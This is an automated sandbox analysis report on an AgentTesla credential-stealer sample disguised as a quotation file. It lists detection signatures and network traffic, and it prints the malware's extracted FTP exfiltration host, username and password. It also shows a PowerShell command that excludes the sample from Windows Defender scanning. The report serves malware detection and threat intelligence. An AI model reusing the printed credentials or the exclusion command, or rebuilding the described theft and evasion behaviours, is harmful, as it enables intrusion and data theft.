Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION#09678.exe

Overview

General Information

Sample name:QUOTATION#09678.exe
Analysis ID:1548264
MD5:b415558b19c70c201f8787e507d09b93
SHA1:bd05a718456b3e0e587feac7a0a4b23734c0fe6d
SHA256:00a3e3e129b127e288fb531581c3c580679423db15464585798d07465b03944d
Tags:AgentTeslaexeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Disables UAC (registry)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION#09678.exe (PID: 1104 cmdline: "C:\Users\user\Desktop\QUOTATION#09678.exe" MD5: B415558B19C70C201F8787E507D09B93)
    • conhost.exe (PID: 3400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7376 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • AddInProcess32.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 1136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 7216 cmdline: C:\Windows\system32\WerFault.exe -u -p 1104 -s 1516 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "admin@ercolina-usa.com", "Password": ",%EVY$JU0=lu"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x35fef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x36061:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x360eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3617d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x361e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x36259:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x362ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3637f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x33095:$s2: GetPrivateProfileString
                  • 0x326cb:$s3: get_OSFullName
                  • 0x33e9d:$s5: remove_Key
                  • 0x34033:$s5: remove_Key
                  • 0x34f6a:$s6: FtpWebRequest
                  • 0x35fd1:$s7: logins
                  • 0x36543:$s7: logins
                  • 0x39220:$s7: logins
                  • 0x39300:$s7: logins
                  • 0x3adcd:$s7: logins
                  • 0x39e9a:$s9: 1.85 (Hash, version 2, native byte-order)
                  Click to see the 18 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 1104, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 4180, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 1104, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 4180, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#09678.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#09678.exe, ParentProcessId: 1104, ParentProcessName: QUOTATION#09678.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force, ProcessId: 4180, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:29:22.239239+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449746TCP
                  2024-11-04T09:30:00.097094+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449749TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "admin@ercolina-usa.com", "Password": ",%EVY$JU0=lu"}
                  Multi AV Scanner detection for submitted file
                  Source: QUOTATION#09678.exeReversingLabs: Detection: 36%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: QUOTATION#09678.exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 1104, type: MEMORYSTR
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: QUOTATION#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.pdb0 source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.pdbh source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdbh source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdb source: WERF85.tmp.dmp.8.dr

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 192.254.225.136 192.254.225.136
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: ip-api.com
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49746
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49749
                  Source: unknownFTP traffic detected: 192.254.225.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: ftp.ercolina-usa.com
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002E3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ercolina-usa.com
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002E3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.ercolina-usa.com
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                  Source: QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: AddInProcess32.exe, 00000004.00000002.4171451807.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, BZbr69Oq62w.cs.Net Code: vJoJ
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, BZbr69Oq62w.cs.Net Code: vJoJ
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: QUOTATION#09678.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B8808100_2_00007FFD9B880810
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88E3950_2_00007FFD9B88E395
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B883F900_2_00007FFD9B883F90
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B883FA00_2_00007FFD9B883FA0
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B888E180_2_00007FFD9B888E18
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88BA110_2_00007FFD9B88BA11
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88B6300_2_00007FFD9B88B630
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B8945890_2_00007FFD9B894589
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B9500500_2_00007FFD9B950050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CA4A804_2_02CA4A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CAD8084_2_02CAD808
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CA3E684_2_02CA3E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CA41B04_2_02CA41B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_069A95114_2_069A9511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_069A41284_2_069A4128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A7F7B04_2_06A7F7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A787F04_2_06A787F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A7B3904_2_06A7B390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A700404_2_06A70040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A7E8504_2_06A7E850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A759B04_2_06A759B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A731F84_2_06A731F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A78F104_2_06A78F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06A7ACB04_2_06A7ACB0
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1104 -s 1516
                  Source: QUOTATION#09678.exeStatic PE information: No import functions for PE file found
                  Source: QUOTATION#09678.exe, 00000000.00000000.1702433313.000001F3CE276000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDwrqwsarwq.exe6 vs QUOTATION#09678.exe
                  Source: QUOTATION#09678.exe, 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8d205da5-a06f-41c4-923e-b97a14abb967.exe4 vs QUOTATION#09678.exe
                  Source: QUOTATION#09678.exeBinary or memory string: OriginalFilenameDwrqwsarwq.exe6 vs QUOTATION#09678.exe
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATION#09678.exe.1f3e00bc350.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: QUOTATION#09678.exe, --------------------.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, hcbDrTLwTC.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, CMQvPoq8cy.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, e5d0T5Np.csCryptographic APIs: 'TransformFinalBlock'
